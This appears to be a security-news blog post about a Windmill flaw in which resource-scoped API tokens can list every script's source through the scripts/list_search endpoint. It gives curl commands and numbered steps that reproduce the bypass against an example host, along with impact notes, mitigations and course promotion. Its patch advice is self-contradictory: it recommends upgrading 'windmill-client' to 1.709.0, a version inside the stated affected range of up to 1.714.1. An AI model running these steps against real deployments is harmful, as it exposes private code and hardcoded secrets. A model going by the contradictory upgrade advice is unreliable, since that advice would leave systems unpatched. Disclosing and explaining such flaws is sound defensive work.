Listen to this Post
How AIKIDO-2026-10918 Works
Windmill supports scoped API tokens with a format of {domain}:{action}[:{resource}], allowing administrators to restrict tokens to specific resources, such as scripts:read:f/allowed/. However, a critical flaw exists in how these scopes are enforced for certain listing endpoints.
The route-level scope middleware validates the token’s domain and action (e.g., scripts:read) but completely ignores the resource/path segment of the scope. For the endpoint GET /api/w/{workspace}/scripts/list_search, the handler executes a SQL query that returns `path` and `content` for all scripts in the workspace without any per-row filtering:
SELECT path, content FROM script WHERE workspace_id = $1 AND archived = false LIMIT $2
There is no additional `check_scopes(…)` call in the handler and no per-row path filtering against the token’s resource restrictions.
As a result, a token created with `scripts:read:f/allowed/` — intended to read only scripts under the `f/allowed/` path — can be used to call the `list_search` endpoint and retrieve the `path` and `content` of all scripts in the workspace, including those under unrelated paths like f/private/script_b. This bypasses the intended resource-scoped restriction and exposes script source code from outside the token’s authorized scope.
This issue appears to be a remaining variant of a broader class of authorization bypasses previously addressed for other endpoints, such as `resources/variables` listing and job preview paths. However, no equivalent fix was applied to scripts/list_search.
DailyCVE Form
Platform: Windmill
Version: <= 1.714.1
Vulnerability: Resource-scoped API token path restriction bypass via /scripts/list_search
Severity: Low
Date: 2026-07-10
Prediction: 2026-07-25
What Undercode Say
Analytics
The vulnerability allows a token with `scripts:read:f/allowed/` scope to retrieve all scripts in the workspace.
Bash Commands & Codes
Create a scoped token (legitimate):
curl -X POST "https://windmill.example.com/api/w/{workspace}/tokens" \
-H "Authorization: Bearer ${ADMIN_TOKEN}" \
-H "Content-Type: application/json" \
-d '{"label":"restricted-read","scopes":["scripts:read:f/allowed/"]}'
Exploit the bypass:
TOKEN="<restricted-token>"
WORKSPACE="your-workspace"
curl -X GET "https://windmill.example.com/api/w/${WORKSPACE}/scripts/list_search" \
-H "Authorization: Bearer ${TOKEN}"
Expected (restricted) response: only `f/allowed/` scripts.
Actual (vulnerable) response: all scripts including `f/private/script_b`.
Check scope of a token:
curl -X GET "https://windmill.example.com/api/w/${WORKSPACE}/tokens/verify" \
-H "Authorization: Bearer ${TOKEN}"
Exploit
- Create or identify a workspace with at least two scripts:
– `f/allowed/script_a`
– `f/private/script_b`
2. Generate a scoped API token with the scopescripts:read:f/allowed/. - Send a `GET` request to `/api/w/{workspace}/scripts/list_search` using the token.
- Observe that the response includes `path` and `content` for both scripts, not just those under
f/allowed/.
This exposes script source code, which may contain:
- Internal automation logic
- Integration details
- Business logic
- Inline configuration
- Accidentally hardcoded secrets or credentials
No admin privileges are required — only possession of a valid scoped API token for the workspace.
Protection
- Upgrade to the patched version of `windmill-client` (1.709.0 or later).
- Avoid using resource-scoped tokens for read access until the patch is applied.
- Audit existing tokens and rotate any that may have been exposed.
- Monitor logs for unexpected `scripts/list_search` requests from restricted tokens.
- Apply the suggested fix: add handler-level authorization or per-row filtering to `scripts/list_search` so that a scoped token only receives scripts whose path is included by at least one `scripts:read:{resource}` scope.
Impact
- Information Disclosure: An attacker with a path-restricted `scripts:read:{resource}` token can read script contents from unrelated paths in the same workspace.
- Exposure of Sensitive Data: Scripts may contain internal automation logic, integration details, business logic, inline configuration, or accidentally hardcoded secrets and credentials.
- Low Complexity: The attack requires no admin privileges; only a valid scoped API token for the workspace.
- Widespread Affected Versions: Confirmed in versions up to and including 1.714.1.
- Related Class of Issues: Similar scoped-token issues have been fixed for other endpoints, but `scripts/list_search` remains vulnerable.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

